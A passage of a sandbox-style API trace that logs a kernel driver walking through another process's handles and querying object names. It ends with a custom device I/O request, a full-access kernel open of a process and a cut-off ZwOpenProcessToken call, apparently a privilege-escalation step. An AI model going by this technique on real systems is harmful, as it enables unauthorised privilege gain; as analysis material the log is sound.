(in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.970] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699a3880, HandleInformation=0x0) returned 0x0 [0264.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.970] PsReleaseProcessExitSynchronization () returned 0x2 [0264.970] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40029 [0264.970] ObQueryNameString (in: Object=0xffffe000699a3880, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.970] ObfDereferenceObject (Object=0xffffe000699a3880) returned 0x7ffe [0264.970] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.970] PsAcquireProcessExitSynchronization () returned 0x0 [0264.970] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.970] ObReferenceObjectByHandle (in: Handle=0x1d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699a9380, HandleInformation=0x0) returned 0x0 [0264.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.970] PsReleaseProcessExitSynchronization () returned 0x2 [0264.970] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40028 [0264.970] ObQueryNameString (in: Object=0xffffe000699a9380, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.970] ObfDereferenceObject (Object=0xffffe000699a9380) returned 0x7ffe [0264.970] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.970] PsAcquireProcessExitSynchronization () returned 0x0 [0264.970] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.970] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a264750, HandleInformation=0x0) returned 0x0 [0264.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.971] PsReleaseProcessExitSynchronization () returned 0x2 [0264.971] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40027 [0264.971] ObQueryNameString (in: Object=0xffffe0006a264750, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.971] ObfDereferenceObject (Object=0xffffe0006a264750) returned 0x7f70 [0264.971] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.971] PsAcquireProcessExitSynchronization () returned 0x0 [0264.971] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.971] ObReferenceObjectByHandle (in: Handle=0x244, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a54d8c0, HandleInformation=0x0) returned 0x0 [0264.971] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.971] PsReleaseProcessExitSynchronization () returned 0x2 [0264.971] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40026 [0264.971] ObQueryNameString (in: Object=0xffffe0006a54d8c0, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.971] ObfDereferenceObject (Object=0xffffe0006a54d8c0) returned 0x7ffc [0264.971] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.971] PsAcquireProcessExitSynchronization () returned 0x0 [0264.971] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.971] ObReferenceObjectByHandle (in: Handle=0x258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b9ef20, HandleInformation=0x0) returned 0x0 [0264.971] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.971] PsReleaseProcessExitSynchronization () returned 0x2 [0264.971] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40025 [0264.971] ObQueryNameString (in: Object=0xffffe00069b9ef20, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.971] ObfDereferenceObject (Object=0xffffe00069b9ef20) returned 0x7f96 [0264.971] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.971] PsAcquireProcessExitSynchronization () returned 0x0 [0264.971] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.971] ObReferenceObjectByHandle (in: Handle=0x2f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a336900, HandleInformation=0x0) returned 0x0 [0264.971] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.971] PsReleaseProcessExitSynchronization () returned 0x2 [0264.971] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40024 [0264.971] ObQueryNameString (in: Object=0xffffe0006a336900, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.971] ObfDereferenceObject (Object=0xffffe0006a336900) returned 0x800f [0264.971] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.971] PsAcquireProcessExitSynchronization () returned 0x0 [0264.971] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.971] ObReferenceObjectByHandle (in: Handle=0x2f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007a69b430, HandleInformation=0x0) returned 0x0 [0264.971] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.971] PsReleaseProcessExitSynchronization () returned 0x2 [0264.971] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40023 [0264.971] ObQueryNameString (in: Object=0xffffe0007a69b430, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.971] ObfDereferenceObject (Object=0xffffe0007a69b430) returned 0x7fff [0264.971] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.971] PsAcquireProcessExitSynchronization () returned 0x0 [0264.971] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.971] ObReferenceObjectByHandle (in: Handle=0x3f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00076fc3cd0, HandleInformation=0x0) returned 0x0 [0264.971] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.971] PsReleaseProcessExitSynchronization () returned 0x2 [0264.972] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40022 [0264.972] ObQueryNameString (in: Object=0xffffe00076fc3cd0, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.972] ObfDereferenceObject (Object=0xffffe00076fc3cd0) returned 0x7fff [0264.972] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.972] PsAcquireProcessExitSynchronization () returned 0x0 [0264.972] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.972] ObReferenceObjectByHandle (in: Handle=0x468, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069be7f20, HandleInformation=0x0) returned 0x0 [0264.972] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.972] PsReleaseProcessExitSynchronization () returned 0x2 [0264.972] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40021 [0264.972] ObQueryNameString (in: Object=0xffffe00069be7f20, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.972] ObfDereferenceObject (Object=0xffffe00069be7f20) returned 0x800f [0264.972] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.972] PsAcquireProcessExitSynchronization () returned 0x0 [0264.972] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.972] ObReferenceObjectByHandle (in: Handle=0x478, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.972] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.972] PsReleaseProcessExitSynchronization () returned 0x2 [0264.972] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40020 [0264.972] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.972] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18ffec [0264.972] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.972] PsAcquireProcessExitSynchronization () returned 0x0 [0264.972] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.972] ObReferenceObjectByHandle (in: Handle=0x488, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.972] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.972] PsReleaseProcessExitSynchronization () returned 0x2 [0264.972] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4001f [0264.972] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.972] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18ffeb [0264.972] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.972] PsAcquireProcessExitSynchronization () returned 0x0 [0264.972] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.972] ObReferenceObjectByHandle (in: Handle=0x49c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f17270, HandleInformation=0x0) returned 0x0 [0264.972] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.972] PsReleaseProcessExitSynchronization () returned 0x2 [0264.972] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4001e [0264.972] ObQueryNameString (in: Object=0xffffe00069f17270, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.972] ObfDereferenceObject (Object=0xffffe00069f17270) returned 0x7fff [0264.972] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.972] PsAcquireProcessExitSynchronization () returned 0x0 [0264.972] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.972] ObReferenceObjectByHandle (in: Handle=0x4e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a627090, HandleInformation=0x0) returned 0x0 [0264.972] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.973] PsReleaseProcessExitSynchronization () returned 0x2 [0264.973] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4001d [0264.973] ObQueryNameString (in: Object=0xffffe0006a627090, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.973] ObfDereferenceObject (Object=0xffffe0006a627090) returned 0x7ffb [0264.973] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.973] PsAcquireProcessExitSynchronization () returned 0x0 [0264.973] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.973] ObReferenceObjectByHandle (in: Handle=0x4e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069164f20, HandleInformation=0x0) returned 0x0 [0264.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.973] PsReleaseProcessExitSynchronization () returned 0x2 [0264.973] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4001c [0264.973] ObQueryNameString (in: Object=0xffffe00069164f20, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.973] ObfDereferenceObject (Object=0xffffe00069164f20) returned 0x7ff5 [0264.973] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.973] PsAcquireProcessExitSynchronization () returned 0x0 [0264.973] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.973] ObReferenceObjectByHandle (in: Handle=0x4ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691649b0, HandleInformation=0x0) returned 0x0 [0264.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.973] PsReleaseProcessExitSynchronization () returned 0x2 [0264.973] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4001b [0264.973] ObQueryNameString (in: Object=0xffffe000691649b0, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.973] ObfDereferenceObject (Object=0xffffe000691649b0) returned 0x7fff [0264.973] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.973] PsAcquireProcessExitSynchronization () returned 0x0 [0264.973] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.973] ObReferenceObjectByHandle (in: Handle=0x50c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000725fd930, HandleInformation=0x0) returned 0x0 [0264.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.973] PsReleaseProcessExitSynchronization () returned 0x2 [0264.973] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4001a [0264.973] ObQueryNameString (in: Object=0xffffe000725fd930, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.973] ObfDereferenceObject (Object=0xffffe000725fd930) returned 0x7f0d [0264.973] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.973] PsAcquireProcessExitSynchronization () returned 0x0 [0264.973] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.973] ObReferenceObjectByHandle (in: Handle=0x510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a48aad0, HandleInformation=0x0) returned 0x0 [0264.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.973] PsReleaseProcessExitSynchronization () returned 0x2 [0264.973] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40019 [0264.973] ObQueryNameString (in: Object=0xffffe0006a48aad0, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.973] ObfDereferenceObject (Object=0xffffe0006a48aad0) returned 0x7ffd [0264.973] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.973] PsAcquireProcessExitSynchronization () returned 0x0 [0264.973] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.973] ObReferenceObjectByHandle (in: Handle=0x54c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a748930, HandleInformation=0x0) returned 0x0 [0264.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.973] PsReleaseProcessExitSynchronization () returned 0x2 [0264.973] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40018 [0264.973] ObQueryNameString (in: Object=0xffffe0006a748930, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.974] ObfDereferenceObject (Object=0xffffe0006a748930) returned 0x7ffc [0264.974] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.974] PsAcquireProcessExitSynchronization () returned 0x0 [0264.974] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.974] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006dfff7a0, HandleInformation=0x0) returned 0x0 [0264.974] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.974] PsReleaseProcessExitSynchronization () returned 0x2 [0264.974] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40017 [0264.974] ObQueryNameString (in: Object=0xffffe0006dfff7a0, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.974] ObfDereferenceObject (Object=0xffffe0006dfff7a0) returned 0x800f [0264.974] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.974] PsAcquireProcessExitSynchronization () returned 0x0 [0264.974] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.974] ObReferenceObjectByHandle (in: Handle=0x5bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069e41790, HandleInformation=0x0) returned 0x0 [0264.974] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.974] PsReleaseProcessExitSynchronization () returned 0x2 [0264.974] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40016 [0264.974] ObQueryNameString (in: Object=0xffffe00069e41790, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.974] ObfDereferenceObject (Object=0xffffe00069e41790) returned 0x7ffd [0264.974] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.974] PsAcquireProcessExitSynchronization () returned 0x0 [0264.974] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.974] ObReferenceObjectByHandle (in: Handle=0x5c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00076f2d8f0, HandleInformation=0x0) returned 0x0 [0264.974] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.974] PsReleaseProcessExitSynchronization () returned 0x2 [0264.974] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40015 [0264.974] ObQueryNameString (in: Object=0xffffe00076f2d8f0, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.974] ObfDereferenceObject (Object=0xffffe00076f2d8f0) returned 0x800f [0264.974] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.974] PsAcquireProcessExitSynchronization () returned 0x0 [0264.974] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.974] ObReferenceObjectByHandle (in: Handle=0x5d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a47b9e0, HandleInformation=0x0) returned 0x0 [0264.974] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.974] PsReleaseProcessExitSynchronization () returned 0x2 [0264.974] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40014 [0264.974] ObQueryNameString (in: Object=0xffffe0006a47b9e0, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.974] ObfDereferenceObject (Object=0xffffe0006a47b9e0) returned 0x7fff [0264.974] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.974] PsAcquireProcessExitSynchronization () returned 0x0 [0264.974] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000b1b8e400) [0264.974] ObReferenceObjectByHandle (in: Handle=0x5d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a62a820, HandleInformation=0x0) returned 0x0 [0264.974] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.974] PsReleaseProcessExitSynchronization () returned 0x2 [0264.974] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x40013 [0264.974] ObQueryNameString (in: Object=0xffffe0006a62a820, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.974] ObfDereferenceObject (Object=0xffffe0006a62a820) returned 0x7fff [0264.975] ObQueryNameString (in: Object=0xffffe0006a4809e0, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.975] ObQueryNameString (in: Object=0xffffe0006a53ef20, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.975] ObQueryNameString (in: Object=0xffffe0006a323770, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x44c) returned 0x180 [0264.975] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.975] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069990840, HandleInformation=0x0) returned 0x0 [0264.975] ObOpenObjectByPointer (in: Object=0xffffe00069990840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.975] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x4801b [0264.975] ZwOpenProcessToken (in: 